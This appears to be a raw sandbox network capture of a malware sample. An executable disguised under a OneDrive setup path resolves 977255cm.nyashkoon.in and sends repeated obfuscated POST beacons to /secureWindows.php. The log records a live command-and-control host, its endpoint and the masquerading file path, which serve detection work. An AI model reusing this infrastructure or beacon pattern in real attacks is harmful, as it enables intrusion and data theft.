                                                        Oct 30, 2024 05:26:04.412267923 CET5029180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:04.417382002 CET8050290188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:04.417443991 CET5029080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:04.417584896 CET8050291188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:04.417644978 CET5029180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:04.417762041 CET5029180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:04.423038006 CET8050291188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:04.762131929 CET5029180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:04.767586946 CET8050291188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:05.025258064 CET8050291188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:05.105777025 CET5029180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:05.222903967 CET8050291188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:05.279318094 CET5029180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:05.279994965 CET5029280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:05.285154104 CET8050291188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:05.285202026 CET5029180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:05.285367012 CET8050292188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:05.285419941 CET5029280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:05.285589933 CET5029280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:05.290822029 CET8050292188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:05.346829891 CET5029280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:05.353363037 CET5029380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:05.358841896 CET8050293188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:05.358911991 CET5029380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:05.359066963 CET5029380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:05.364305019 CET8050293188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:05.395031929 CET8050292188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:05.715236902 CET5029380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:05.720664024 CET8050293188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:05.763959885 CET8050292188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:05.764003992 CET5029280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:05.989790916 CET8050293188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:06.053368092 CET5029380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:06.296597958 CET8050293188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:06.412448883 CET5029380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:06.413297892 CET5029480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:06.418351889 CET8050293188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:06.418632030 CET8050294188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:06.421180010 CET5029380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:06.421216965 CET5029480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:06.421336889 CET5029480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:06.426618099 CET8050294188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:07.016738892 CET8050294188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:07.106638908 CET5029480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:10.299504995 CET5029480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:10.304867029 CET8050294188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:10.628377914 CET8050294188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:10.629594088 CET5029480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:26:10.635211945 CET8050294188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:26:10.635303020 CET5029480192.168.2.4188.114.96.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 30, 2024 05:22:06.677472115 CET | 52308 | 53 | 192.168.2.4 | 1.1.1.1
Oct 30, 2024 05:22:06.692018032 CET | 53 | 52308 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 30, 2024 05:22:06.677472115 CET | 192.168.2.4 | 1.1.1.1 | 0x784 | Standard query (0) | 977255cm.nyashkoon.in | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 30, 2024 05:22:06.692018032 CET | 1.1.1.1 | 192.168.2.4 | 0x784 | No error (0) | 977255cm.nyashkoon.in | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 05:22:06.692018032 CET | 1.1.1.1 | 192.168.2.4 | 0x784 | No error (0) | 977255cm.nyashkoon.in | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                                        • 977255cm.nyashkoon.in
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 05:22:06.743472099 CET | 309 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 344
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
Oct 30, 2024 05:22:07.371233940 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 30, 2024 05:22:07.703283072 CET | 1236 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Re8ZNHgA7nd%2FuUSNOMnUrCb8bdniYVzOUDdrn9MrYqNd81ABD9HzQMJ9y9FX7RR8v%2Br%2B3sf0VhFy3vmH3gaaUEAEL84AKAZKjD5bt4GMBUZPOA2lXxWNFGobUL0dAp20wasG9SKjPSI%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89f57b9d96be4-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1312&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=653&delivery_rate=729471&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Oct 30, 2024 05:22:07.838994980 CET | 285 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 384
                                                        Expect: 100-continue
Oct 30, 2024 05:22:07.970782042 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 30, 2024 05:22:08.295356989 CET | 952 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a0OUlNTUD7UWWX%2BVcyI7jTW7vz0XknNI3WccgcmB6Ggy%2FPs%2BXdDntrZnon958%2B1K%2BUOB%2FfIfuh7yBA7y%2F%2Bp8EVEQBl6x7ceDs5Ng%2FrkpRzTNzzaDH0AMS9bQFn9%2B92czrh5Mr8XAbtk%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89f5b7e4a6be4-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1237&sent=8&recv=10&lost=0&retrans=0&sent_bytes=2132&recv_bytes=1322&delivery_rate=3840848&cwnd=254&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Oct 30, 2024 05:22:08.327297926 CET | 286 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
Oct 30, 2024 05:22:08.457668066 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 30, 2024 05:22:08.775423050 CET | 935 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4PWJ7iiiJbAJ8YmwvJrtBQVKAy1YdSvTq971FMtbvEuO87QK4GcXsmOtvvSAHpR2sY%2BSOe4DjGJJe1lJLmocHAaWqJ0XeIReAFuByFXPjvB2WskGtZnRImdtrVivOAGUnp3GHVoOmwk%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89f5e8a876be4-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1185&sent=13&recv=16&lost=0&retrans=0&sent_bytes=3109&recv_bytes=2948&delivery_rate=3840848&cwnd=257&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 05:22:08.068360090 CET | 286 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
Oct 30, 2024 05:22:08.654841900 CET | 25 | IN | HTTP/1.1 100 Continue
Oct 30, 2024 05:22:08.970016956 CET | 782 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1bWiKJEmVLa%2FsHbGBAiONpCvus94gRsxjqUqeCuvwKxG5dq7b3Io7JVgiPPJHUL6uY8tZrU7dAS3enKNoWJj6Thk9XXsgkZgJ8QkITQWPjuEoDRcYZPCe8syLBNBR1dFjk0bFZTElQY%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89f5fc85f6be3-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1116&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1409931&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        2 | 192.168.2.4 | 49732 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:09.100539923 CET | 286 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:22:09.448961973 CET | 1076 | OUT | Data Raw: 57 53 59 50 55 5f 56 5d 58 57 50 59 55 5e 5b 5c 54 53 5c 5e 59 56 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WSYPU_V]XWPYU^[\TS\^YVZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^,#1?8"0>#.&0_2[8_;Z":4'9(+>$89 F$,Z*=
                                                        Oct 30, 2024 05:22:09.694474936 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:10.022835016 CET | 786 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:09 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wahM2noFiWwaepInj5W%2FjWvjTNt55KsnyuG24M4V%2BzwsEseIkv7WO%2B8GeqUyknRwL33ZBJYB2A7ky6mvohrumUQ9yREVZEFVneKG948l6ccmkpg81RQqKFBFlEHuf7HfbA9tQaiOGHU%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89f663e87e76a-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1354&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1099468&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        3 | 192.168.2.4 | 49733 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:10.166030884 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:10.511221886 CET | 1076 | OUT | Data Raw: 52 50 5c 5d 55 55 56 50 58 57 50 59 55 5e 5b 5c 54 52 5c 58 59 53 5a 5b 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RP\]UUVPXWPYU^[\TR\XYSZ[]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&,V&<(.]0-'.% [1=X8:(4+X&/?6'8*/: F$,Z*=
                                                        Oct 30, 2024 05:22:10.752176046 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:11.071619987 CET | 794 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ouOl8zdgm%2FmH%2B49KX7y72JG0rFso4rZRRPTInW4f%2FhFpkX4iRTpvX7vDIyOLHQ%2Ba7JRKdAggWOb9FsRHA7Sso6RnhA0l6VBjApJC8RqZy5STc%2Bma1KLBN5Chqf%2BHElX0UwNrOkQMZ%2F8%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89f6cd96447ae-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1206&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1317561&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        4 | 192.168.2.4 | 49734 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:11.290406942 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:11.636276007 CET | 1076 | OUT | Data Raw: 52 57 59 55 55 5a 56 54 58 57 50 59 55 5f 5b 59 54 5d 5c 5e 59 53 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RWYUUZVTXWPYU_[YT]\^YSZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^8"](-0=90\2',79;19?(65]'89 F$,Z*
                                                        Oct 30, 2024 05:22:11.884320021 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:12.219506979 CET | 788 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:12 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XxfE%2BQU8XGniVhlTNqh5wi9ED0vf11ZfZ2vvSfcsyUWjONWcAatJROrdckko%2FC3HtdfrywlySTEG6wIy12pqMF2OPJTPMQAlW9zSYCpcs70j%2FRw%2FOUiQJoWkgWEyxekgDZm03tPmI5M%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89f73efd82cd6-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1304&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1120743&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        5 | 192.168.2.4 | 49735 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:12.355329990 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:12.714437962 CET | 1076 | OUT | Data Raw: 52 54 5c 55 50 5f 53 51 58 57 50 59 55 50 5b 5e 54 5f 5c 54 59 54 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RT\UP_SQXWPYUP[^T_\TYTZ]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&- 2=+"X07.(%=8^,"97X&+_(=&(99 F$,Z*
                                                        Oct 30, 2024 05:22:12.952776909 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:13.261493921 CET | 792 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:13 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y4n2OG%2FQqFhwpISjsX2FOdEfSydPbELHyo4jc%2FkK%2FQbNeghsHdpyg3CejUPMS1IwKv1rP%2FTzCPPRZNAYh1yDlXOQHcTvgWxaNqOwcqwr%2FdD6y3pFQ1AT9NF3j4d%2FOo1bIRTetzp3UFo%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89f7a9f134790-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1203&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1235494&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        6 | 192.168.2.4 | 49736 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:13.386506081 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:13.745790005 CET | 1076 | OUT | Data Raw: 57 51 5c 51 55 55 56 54 58 57 50 59 55 5a 5b 59 54 58 5c 5a 59 56 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WQ\QUUVTXWPYUZ[YTX\ZYVZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&82]<.\$.+96,Z&'8,#:7X&*+\+5$(9 F$,Z*-


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        7 | 192.168.2.4 | 49737 | 188.114.96.3 | 80 | 7760 | C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Oct 30, 2024 05:22:13.800328970 CET | 310 | OUT | POST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:22:14.151985884 CET | 1340 | OUT | Data Raw: 57 50 5c 5d 55 5a 56 50 58 57 50 59 55 5b 5b 5c 54 5d 5c 58 59 50 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WP\]UZVPXWPYU[[\T]\XYPZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%[,"\?8]0=#A-]%=; 9$%_((C&385_:: F$,Z*)
                                                        Oct 30, 2024 05:22:14.394207001 CET | 25 | IN | HTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:22:14.702514887 CET | 937 | IN | HTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:22:14 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y4y2tyEMN72yMGXpVG73ByXqn8XYDBTLHTZv8VZA87byrpWY%2FbvMOpKVrg1KIf9GMqTBzpxl0Qv6YgIVlV4MBjg90INIEKOU8Sx%2BtQtLXvZ5jKDCirVLwiNRXbqvgu%2FMklmtGBv%2BU9E%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da89f839fa63acf-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1195&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=1232340&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
